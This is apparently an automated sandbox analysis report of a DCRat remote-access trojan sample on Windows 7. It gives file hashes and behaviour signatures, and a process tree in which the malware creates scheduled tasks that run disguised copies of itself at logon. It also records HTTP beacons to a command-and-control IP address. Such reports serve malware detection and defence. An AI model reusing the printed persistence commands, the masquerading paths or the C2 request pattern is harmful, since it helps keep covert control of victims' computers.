Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    06/12/2024, 20:29 UTC

General

  • Target

    1e1ee51c8a265b2b86b0c6aec30e8ba5c8a1ea69a2d47bbceff7813fc673ed7d.exe

  • Size

    952KB

  • MD5

    95939c0925ece0edd3465ef067ca58c8

  • SHA1

    7c0f4691d4f60beb794a161834702623b610c2a6

  • SHA256

    1e1ee51c8a265b2b86b0c6aec30e8ba5c8a1ea69a2d47bbceff7813fc673ed7d

  • SHA512

    b46684d36fc7be55fc83d84866fa91c8af85c19dc3f23922f6acf241e173dbfb173bda53d18bfc447f751315c004ea5dd06079a10d1a6acb70a354e98e5e9625

  • SSDEEP

    24576:u+O7F9smBDJwWmIezBLwsHuWbxR4AK5ZJXX:p8/KfRTK

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Modifies WinLogon for persistence 2 TTPs 6 IoCs
  • Process spawned unexpected child process 6 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 6 IoCs
  • DCRat payload 7 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 12 IoCs
  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Drops file in System32 directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs
  • System policy modification 1 TTPs 6 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\1e1ee51c8a265b2b86b0c6aec30e8ba5c8a1ea69a2d47bbceff7813fc673ed7d.exe
    "C:\Users\Admin\AppData\Local\Temp\1e1ee51c8a265b2b86b0c6aec30e8ba5c8a1ea69a2d47bbceff7813fc673ed7d.exe"
    1⤵
    • Modifies WinLogon for persistence
    • UAC bypass
    • Adds Run key to start application
    • Checks whether UAC is enabled
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2388
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\MhoiJDNFqU.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1804
      • C:\Windows\system32\w32tm.exe
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        3⤵
        PID:1516
        • C:\Windows\System32\wlangpui\lsm.exe
          "C:\Windows\System32\wlangpui\lsm.exe"
          3⤵
          • UAC bypass
          • Executes dropped EXE
          • Checks whether UAC is enabled
          • Suspicious use of AdjustPrivilegeToken
          • System policy modification
          PID:2216
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\explorer.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2752
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\PerfLogs\Admin\wininit.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2928
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Documents and Settings\csrss.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2896
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\taskhost.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2768
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Windows\System32\wlangpui\lsm.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2612
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\MdRes\dllhost.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2724

    Network

    • flag-ru
      GET
      http://37.230.117.59/imageVmLongpolluniversal.php?AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9&3dfda1326f23fa458772de2e5dad5824=b7ab15875a4640475dcbbba6591b0c2a&feda21d96cfab96e4a2f4867c20389ba=wM1E2MzAzYxcjN4QWO1ETY2YzYiFGM5ETNjNWZhRWNhFTMyYDM1UDO&AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9
      lsm.exe
      Remote address:
      37.230.117.59:80
      Request
      GET /imageVmLongpolluniversal.php?AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9&3dfda1326f23fa458772de2e5dad5824=b7ab15875a4640475dcbbba6591b0c2a&feda21d96cfab96e4a2f4867c20389ba=wM1E2MzAzYxcjN4QWO1ETY2YzYiFGM5ETNjNWZhRWNhFTMyYDM1UDO&AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9 HTTP/1.1
      Accept: */*
      Content-Type: text/javascript
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
      Host: 37.230.117.59
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Fri, 06 Dec 2024 20:29:55 GMT
      Server: Apache/2.4.25 (Debian)
      Content-Length: 275
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html; charset=iso-8859-1
    • flag-ru
      GET
      http://37.230.117.59/imageVmLongpolluniversal.php?AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9&3dfda1326f23fa458772de2e5dad5824=b7ab15875a4640475dcbbba6591b0c2a&feda21d96cfab96e4a2f4867c20389ba=wM1E2MzAzYxcjN4QWO1ETY2YzYiFGM5ETNjNWZhRWNhFTMyYDM1UDO&AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9
      lsm.exe
      Remote address:
      37.230.117.59:80
      Request
      GET /imageVmLongpolluniversal.php?AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9&3dfda1326f23fa458772de2e5dad5824=b7ab15875a4640475dcbbba6591b0c2a&feda21d96cfab96e4a2f4867c20389ba=wM1E2MzAzYxcjN4QWO1ETY2YzYiFGM5ETNjNWZhRWNhFTMyYDM1UDO&AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9 HTTP/1.1
      Accept: */*
      Content-Type: text/javascript
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
      Host: 37.230.117.59
      Response
      HTTP/1.1 404 Not Found
      Date: Fri, 06 Dec 2024 20:29:55 GMT
      Server: Apache/2.4.25 (Debian)
      Content-Length: 275
      Content-Type: text/html; charset=iso-8859-1
    • 37.230.117.59:80
      http://37.230.117.59/imageVmLongpolluniversal.php?AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9&3dfda1326f23fa458772de2e5dad5824=b7ab15875a4640475dcbbba6591b0c2a&feda21d96cfab96e4a2f4867c20389ba=wM1E2MzAzYxcjN4QWO1ETY2YzYiFGM5ETNjNWZhRWNhFTMyYDM1UDO&AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9
      http
      lsm.exe
      1.5kB
      1.1kB
      5
      4

      HTTP Request

      GET http://37.230.117.59/imageVmLongpolluniversal.php?AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9&3dfda1326f23fa458772de2e5dad5824=b7ab15875a4640475dcbbba6591b0c2a&feda21d96cfab96e4a2f4867c20389ba=wM1E2MzAzYxcjN4QWO1ETY2YzYiFGM5ETNjNWZhRWNhFTMyYDM1UDO&AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9

      HTTP Response

      404

      HTTP Request

      GET http://37.230.117.59/imageVmLongpolluniversal.php?AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9&3dfda1326f23fa458772de2e5dad5824=b7ab15875a4640475dcbbba6591b0c2a&feda21d96cfab96e4a2f4867c20389ba=wM1E2MzAzYxcjN4QWO1ETY2YzYiFGM5ETNjNWZhRWNhFTMyYDM1UDO&AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9

      HTTP Response

      404

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\explorer.exe

      Filesize

      952KB

      MD5

      a0188adcd3266031be0b2fa14721ec68

      SHA1

      3a257a2045d863d5f8c736f21ecf639ea90149ed

      SHA256

      49b8b3f175660a091a5f34a036d6ff6f1ca1b64d80ff4874c7082624f46ec84b

      SHA512

      99782e3b7ec9a7ab4c58fa8d96ba70d161aa68e4fccea7d841f82404468d690834c70c386dd33069615b3618b825a502324436d792cbd9aa01522c6ae821d3cf

    • C:\Users\Admin\AppData\Local\Temp\MhoiJDNFqU.bat

      Filesize

      200B

      MD5

      c0691dff372da41143fec1f5953cb2a7

      SHA1

      05644947e1ac1597c9d59c444e8f3ea2cd19864e

      SHA256

      bf6a6ecbf6e51721f1331d7fd34f33805d8614792facae2f885954120da38231

      SHA512

      7521cb2e20bd6a5ac5a032b9520962dbc67796737d2a013f83e8de82e69030b454581c3f948afbcaacffa7550c0d44eefc6d66476abb414e1702c3a575091c8d

    • C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\taskhost.exe

      Filesize

      952KB

      MD5

      724676cd654194a3de063ea52502ef99

      SHA1

      c423b3bccf5568bade3180b2a869a2613ec4bad0

      SHA256

      2535e16dec497bcbd27100df14f9317fe149869ba8f5a334de4a75bad6c6c7f9

      SHA512

      c1e365a6ca98706cbcf8afe6c96530e5ad4de9c67bf7daf49363c506bdfda6a8096505d56286706c179bf8eaab747632857b1fa4ec41f52e7b86993d79b3bcd9

    • C:\Users\csrss.exe

      Filesize

      952KB

      MD5

      c99ee76eb8073aecb0d87b34ec7a40a1

      SHA1

      3bc291d384d0289253cdfc3c9ed73f9650220b3b

      SHA256

      0933c3afa33b1450228f34073b0afdef63be1cc1514c442737b1b9bd4851db93

      SHA512

      06833ed18d047c5363be1d196807f6c6bc80badb14967e0d8196c3ba21581a658bff9217e5daad38a92a6c71ab81bb39436433ae849c0b934b66c1c19e9533dc

    • C:\Windows\System32\wlangpui\lsm.exe

      Filesize

      952KB

      MD5

      95939c0925ece0edd3465ef067ca58c8

      SHA1

      7c0f4691d4f60beb794a161834702623b610c2a6

      SHA256

      1e1ee51c8a265b2b86b0c6aec30e8ba5c8a1ea69a2d47bbceff7813fc673ed7d

      SHA512

      b46684d36fc7be55fc83d84866fa91c8af85c19dc3f23922f6acf241e173dbfb173bda53d18bfc447f751315c004ea5dd06079a10d1a6acb70a354e98e5e9625

    • C:\Windows\System32\wlangpui\lsm.exe

      Filesize

      952KB

      MD5

      0727fbe77deb1e4428a8ee05897264e6

      SHA1

      cff32a1a2a894d7bba710a17d4a1ed91ebf680e1

      SHA256

      320332087ffdf5ddbde31a961e2255e42940a6c1e6241508f75316b453d05cd6

      SHA512

      08785f08c9f6b907161609e550bc2b970fdffb6a0cbd3f91dfd7a57e8d6d86b49562eca648a4b9d424a9a14a7df8ce53d441949177a5ef14fe7d09df3ea6986a

    • memory/2216-105-0x00000000002F0000-0x00000000003E4000-memory.dmp

      Filesize

      976KB

    • memory/2388-6-0x0000000000150000-0x000000000015C000-memory.dmp

      Filesize

      48KB

    • memory/2388-10-0x0000000000500000-0x000000000050C000-memory.dmp

      Filesize

      48KB

    • memory/2388-9-0x00000000002F0000-0x00000000002FA000-memory.dmp

      Filesize

      40KB

    • memory/2388-11-0x00000000002C0000-0x00000000002CC000-memory.dmp

      Filesize

      48KB

    • memory/2388-8-0x0000000000180000-0x0000000000188000-memory.dmp

      Filesize

      32KB

    • memory/2388-4-0x0000000000160000-0x0000000000170000-memory.dmp

      Filesize

      64KB

    • memory/2388-5-0x0000000000190000-0x000000000019A000-memory.dmp

      Filesize

      40KB

    • memory/2388-0-0x000007FEF5063000-0x000007FEF5064000-memory.dmp

      Filesize

      4KB

    • memory/2388-7-0x0000000000170000-0x000000000017A000-memory.dmp

      Filesize

      40KB

    • memory/2388-3-0x0000000000140000-0x0000000000150000-memory.dmp

      Filesize

      64KB

    • memory/2388-2-0x000007FEF5060000-0x000007FEF5A4C000-memory.dmp

      Filesize

      9.9MB

    • memory/2388-102-0x000007FEF5060000-0x000007FEF5A4C000-memory.dmp

      Filesize

      9.9MB

    • memory/2388-1-0x0000000000300000-0x00000000003F4000-memory.dmp

      Filesize

      976KB